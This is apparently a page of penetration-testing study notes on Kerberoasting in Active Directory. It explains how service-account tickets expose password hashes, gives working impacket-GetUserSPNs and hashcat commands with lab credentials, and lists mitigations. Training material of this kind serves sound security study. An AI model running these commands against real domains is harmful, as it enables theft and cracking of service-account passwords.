Kerberoasting

Overview

This attack takes advantage of service accounts that use Kerberos authentication.

First we request a TGT (Ticket Granting Ticket) from the KDC using the account we compromised. Next we request a TGS (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the Services account password hash.

Using the tool GetUserSPNs to request a TGS and obtain the Service accounts password hash.

GetUserSPNs

sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -request

hashcat -m 13100 crackme.txt ~/rockyou.txt -O

Mitigation

Strong password policy
Principle of least privilege
Service accounts should NOT be Domain Administrators

PreviousDumping and Cracking Hashes NextKnock and Pass Kerberos

Last updated 1 year ago

hashtagOverview

hashtagGetUserSPNs

hashtagMitigation

Overview

GetUserSPNs

Mitigation